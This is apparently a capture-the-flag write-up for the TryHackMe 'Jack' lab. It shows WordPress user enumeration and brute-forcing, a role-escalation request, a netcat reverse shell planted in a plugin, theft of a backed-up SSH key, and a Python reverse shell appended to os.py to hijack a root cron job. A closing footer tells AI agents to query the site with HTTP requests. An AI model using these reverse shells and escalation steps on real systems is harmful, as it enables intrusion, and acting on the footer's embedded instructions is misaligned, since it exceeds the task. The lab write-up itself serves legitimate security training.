# TryHackMe - Jack ![Jack](/files/-M7EKYrg1QGl-WvLe6fd) ## Getting Root 1. We start by enumerating the box and notice that its running WordPress. Then using the **wpscan** tool, we can enumerate users and get some credentials by **brute-forcing** the application. 2. To get a **reverse shell** we escalate our privileges from normal user to administrator on WordPress and then edit the **php** file and inject our **reverse shell code** 3. After getting a **reverse shell** as user **www-data**, we can find the **id\_rsa** ssh key of **jack** 4. After enumerating the box with **linpeas.sh**, we notice that there is a **cron** job executed by root which is running a script that imports the **os** module which we have read and write access. 5. We modify the **os** module and get a reverse shell as root. ## Tools Used: **`nmap, wpscan, Burp, pspy`** ## Nmap ![](/files/-M7ENw0Zl99QDMUhx-Xp) ```bash # nmap -A 10.10.186.74 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 14:55 EDT Nmap scan report for jack.thm (10.10.186.74) Host is up (0.12s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 3e:79:78:08:93:31:d0:83:7f:e2:bc:b6:14:bf:5d:9b (RSA) | 256 3a:67:9f:af:7e:66:fa:e3:f8:c7:54:49:63:38:a2:93 (ECDSA) |_ 256 8c:ef:55:b0:23:73:2c:14:09:45:22:ac:84:cb:40:d2 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 5.3.2 | http-robots.txt: 1 disallowed entry |_/wp-admin/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Jack's Personal Site – Blog for Jacks writing adven... Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.19 seconds ``` ## Enumeration There is a note saying we should add **jack.thm** to the `/etc/hosts` ![](/files/-M7EPu0SxLXZuYmDdkQ9) Edit your `/etc/hosts` file and add: ``` 10.10.186.74 jack.thm ``` ### **Port 80 - WordPress** **Visiting the site** ![](/files/-M7ER2YIuabeRfGalBY_) From the **nmap** results, we can see the **`/wp-admin/`** in the results which takes us to the WordPress login form, but we don't have any credentials yet. ![](/files/-M7ES1CX6t5p6wV8Uw6G) ### Using WPScan I used the following command below to enumerate users. ``` wpscan --url jack.thm -e u ``` Users Found: ![](/files/-M7ETJ7inefu0hGAg8mT) We create a file named **users.txt** and those usernames. Now we can try to brute force WordPress and see if we get lucky. Use the **`-h`** to get help for **wpscan**, but basically **`-U`** is the file with the users, **`-P`** is the password wordlist I used, and then the **`--url`** to point it to the target. ``` wpscan -U users.txt -P /usr/share/wordlists/fasttrack.txt --url jack.thm ``` After a few minutes, we get the password for **wendy** and we can successfully login. ![](/files/-M7EUtc0WRXfQIKStwF8) ![](/files/-M7EVHy2t57luR3lCGB8) ## **Exploitation** After login into the dashboard, there is no much we can do to get a reverse shell, however there is an exploit that allow us to get administrator privileges on the WordPress dashboard and that should help us get some code execution. {% embed url="" %} You can use **metasploit**, but we are going to do it manually. The first thing we need to do, is start **Burp Suite** and intercept the requests. Then, we go to **Profile** ![](/files/-M7Eck2QLvR37JPJgIfi) Click **Update Profile** ![](/files/-M7Ed7-w8_JvayfqcGBW) The request will look as follows ![](/files/-M7EdP9bHRSU8KgaEwT4) Add the following to the Request (our change was added before **\&action**) ``` &ure_other_roles=administrator& ``` The edited request should look like this ![](/files/-M7EdsPBCh2_TKYQJamL) Then click forward to allow Burp to send the edited request, and your dashboard should now look as follows: ![](/files/-M7Edyv5-SpRSkpOkROK) ## Getting a Shell Go to Plugin Editor ![](/files/-M7Eiki_F58sCCcTG10f) You will be prompted with a Warning letting you know that you should not be editing the plugins directly. Click "**I understand**" ![](/files/-M7EixrB6lI6IMwHFjAn) Now we are going to add our code and hopefully get a reverse shell ![](/files/-M7EjyDtobvyh-q2YoLH) We are going to use the following to get our reverse shell ```bash rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.7.188 9001 >/tmp/f ``` ![](/files/-M7EtIsXzRlIVsBpIRh7) Click on **Update File** ![](/files/-M7EuJhPJspnnVdq8_tz) ### Triggering the code and getting a shell #### We start our listener ```bash # rlwrap nc -lnvp 9001 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::9001 Ncat: Listening on 0.0.0.0:9001 ``` We go to **Installed Plugins** and click **Activate** ![](/files/-M7EvN50u44uMdubv6FA) And, we get a shell ![](/files/-M7Ew1oW-7GnrZKxcfC2) To get a proper shell, follow the following steps: ```bash # In reverse shell $ /usr/bin/python3.5 -c 'import pty;pty.spawn("/bin/bash")' Ctrl-Z # In Attacker console stty -a stty raw -echo fg # In reverse shell reset export SHELL=bash export TERM=xterm-256color stty rows columns ``` ## Privilege Escalation We can get the **user flag** and continue enumerating. ```bash www-data@jack:/home/jack$ ls -la ls -la total 40 drwxr-xr-x 4 jack jack 4096 May 13 13:24 . drwxr-xr-x 3 root root 4096 Jan 8 11:21 .. lrwxrwxrwx 1 jack jack 9 Jan 10 09:29 .bash_history -> /dev/null -rw-r--r-- 1 jack jack 220 Jan 8 11:21 .bash_logout -rw-r--r-- 1 jack jack 3771 Jan 8 11:21 .bashrc drwx------ 2 jack jack 4096 Jan 9 09:57 .cache -rw-r--r-- 1 jack jack 655 Jan 8 11:21 .profile drwx------ 2 jack jack 4096 Jan 10 18:33 .ssh -rw------- 1 jack jack 1820 May 13 13:24 .viminfo -rw-r--r-- 1 root root 140 Jan 10 15:08 reminder.txt -rw-rw-r-- 1 jack jack 33 Jan 10 09:33 user.txt www-data@jack:/home/jack$ ls -l ls -l total 8 -rw-r--r-- 1 root root 140 Jan 10 15:08 reminder.txt -rw-rw-r-- 1 jack jack 33 Jan 10 09:33 user.txt www-data@jack:/home/jack$ ``` Checking out the **`reminder.txt`** file, we noticed something related to backups, so we do some enumeration and find a **backups** folder with an ssh key which we can use to login as **jack**. ```bash www-data@jack:/home/jack$ cat reminder.txt cat reminder.txt Please read the memo on linux file permissions, last time your backups almost got us hacked! Jack will hear about this when he gets back. www-data@jack:/home/jack$ ``` We search for a directory named backup and we find something under **`/var`** ```bash # find / -type d -name backup* -ls 2>/dev/null www-data@jack:/home/jack$ find / -type d -name backup* 2>/dev/null find / -type d -name backup* 2>/dev/null /var/backups www-data@jack:/home/jack$ # Checking the backups www-data@jack:/home/jack$ ls -ld /var/backups ls -ld /var/backups drwxr-xr-x 2 root root 4096 Jan 10 15:05 /var/backups ``` List of files under **`/var/backups`** ![](/files/-M7F71q7AjsIgxUQk4lh) We can login as user **jack** after changing the permissions of the **id\_rsa** to **600** ```bash chmod 600 id_rsa ``` ![](/files/-M7F9eD7YCNjB5P6-ogI) Using **pspy** to monitor the processes that are running, we notice that **root** has a **cronjob** running every minute. The script is located at **`/opt/statuscheck/checker.py`** ![](/files/-M7F04VQmrw-O4sVe4QM) The contents of the script shows that it imports the python module **os** ![](/files/-M7FBLEy0iG30X3p6jbv) With all that information we discovered, it's time to do some further enumeration. We noticed that the user **jack** is part of the **family group** which has the ability to **write** on any files under the **`/usr/lib/python2.7/`** directory. This is good because the **os** module is under that directory and our user **jack** has write access to that module. ```bash # Checking the user jack www-data@jack:/home/jack$ id jack id jack uid=1000(jack) gid=1000(jack) groups=1000(jack),4(adm),24(cdrom),30(dip),46(plugdev),115(lpadmin),116(sambashare),1001(family) ``` ![](/files/-M7FCFc9-BXzpeLrD6S7) To exploit this, we edit the **`/usr/lib/python2.7/os.py`** module and add the following reverse shell all the way at the end. ```bash import socket import pty s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.11.7.188",9008)) dup2(s.fileno(),0) dup2(s.fileno(),1) dup2(s.fileno(),2) pty.spawn("/bin/bash") ``` We start a listener and wait a minute for the cronjob to run, and we get a root shell. ```bash Ncat: Listening on :::9008 Ncat: Listening on 0.0.0.0:9008 Ncat: Connection from 10.10.186.74. Ncat: Connection from 10.10.186.74:57942. root@jack:~# id id uid=0(root) gid=0(root) groups=0(root) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://squid22.gitbook.io/notes/ctf/tryhackme-writeups/jack.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.